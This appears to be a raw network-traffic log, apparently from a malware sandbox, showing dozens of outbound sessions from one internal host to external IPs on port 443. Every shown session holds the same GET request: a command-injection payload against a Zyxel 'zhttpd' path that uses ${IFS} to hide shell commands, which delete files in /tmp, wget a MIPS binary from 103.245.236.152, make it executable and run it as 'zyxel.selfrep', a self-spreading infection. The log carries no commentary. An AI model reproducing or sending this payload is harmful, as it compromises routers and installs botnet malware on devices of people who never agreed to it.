                                          Jan 14, 2024 15:46:27.250587940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7055192.168.2.233283424.117.219.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250616074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7056192.168.2.234779689.49.60.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250633955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7057192.168.2.2352982172.52.41.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250668049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7058192.168.2.234641677.21.136.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250691891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7059192.168.2.234874852.83.164.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250714064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7060192.168.2.2352778196.85.97.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250751019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7061192.168.2.2334784152.100.166.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250766993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7062192.168.2.2347216169.39.221.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250783920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7063192.168.2.2355624124.177.92.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250804901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7064192.168.2.2335738106.246.171.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250838041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7065192.168.2.235236094.205.221.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250852108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7066192.168.2.234306053.245.197.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250886917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7067192.168.2.2350704176.158.166.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250899076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7068192.168.2.2349988119.3.197.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250938892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7069192.168.2.2352208164.22.4.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250953913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7070192.168.2.2335822172.204.143.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250998020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7071192.168.2.235534874.23.210.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251032114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7072192.168.2.234260473.253.183.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251054049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7073192.168.2.2341990198.13.16.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251085997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7074192.168.2.2343462122.23.168.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251106024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7075192.168.2.2360806168.208.0.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251118898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7076192.168.2.2349382132.44.149.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251142979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7077192.168.2.2334478114.137.159.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251159906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7078192.168.2.2355026145.88.210.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251203060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7079192.168.2.2347646181.14.171.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251250982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7080192.168.2.233419838.24.240.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251271963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7081192.168.2.2348830112.35.15.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251274109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7082192.168.2.235961471.98.213.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251313925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7083192.168.2.2354132197.108.217.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251342058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7084192.168.2.23378805.161.54.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251372099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7085192.168.2.2337038138.128.102.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251422882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7086192.168.2.2340722116.76.160.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251422882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7087192.168.2.2342182104.79.90.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251461983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7088192.168.2.234851683.205.106.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251492977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7089192.168.2.235480477.116.12.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251528025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7090192.168.2.2341280114.19.108.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251552105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7091192.168.2.234811273.193.239.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251590014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7092192.168.2.235214285.155.137.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251620054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7093192.168.2.2334232193.183.218.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251633883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7094192.168.2.235041264.210.252.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251663923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7095192.168.2.2346452137.255.4.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251697063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7096192.168.2.2358286111.37.139.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251697063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7097192.168.2.233945812.113.236.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251710892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7098192.168.2.2355252219.147.250.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251774073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7099192.168.2.233500832.180.124.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251780033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7100192.168.2.2352714160.82.106.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251801014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7101192.168.2.2357530199.31.113.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251827002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7102192.168.2.235936249.15.89.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251863003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7103192.168.2.2354750132.232.134.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251866102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7104192.168.2.2354690169.25.15.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251868963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7105192.168.2.234432881.54.148.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251893044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7106192.168.2.235761662.55.2.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251928091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7107192.168.2.234175064.149.148.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251945972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7108192.168.2.2349064154.237.243.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.251983881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7109192.168.2.2354900190.70.198.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252005100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7110192.168.2.2355786144.75.212.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252039909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7111192.168.2.2339826103.179.98.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252063036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7112192.168.2.2357760101.112.125.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252096891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7113192.168.2.2339010109.154.4.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252131939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7114192.168.2.2334842120.171.176.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252135992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7115192.168.2.2333558211.112.110.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252172947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7116192.168.2.2353484199.135.88.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252186060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7117192.168.2.2337334159.118.84.50443
                                          TimestampBytes transferredDirectionData
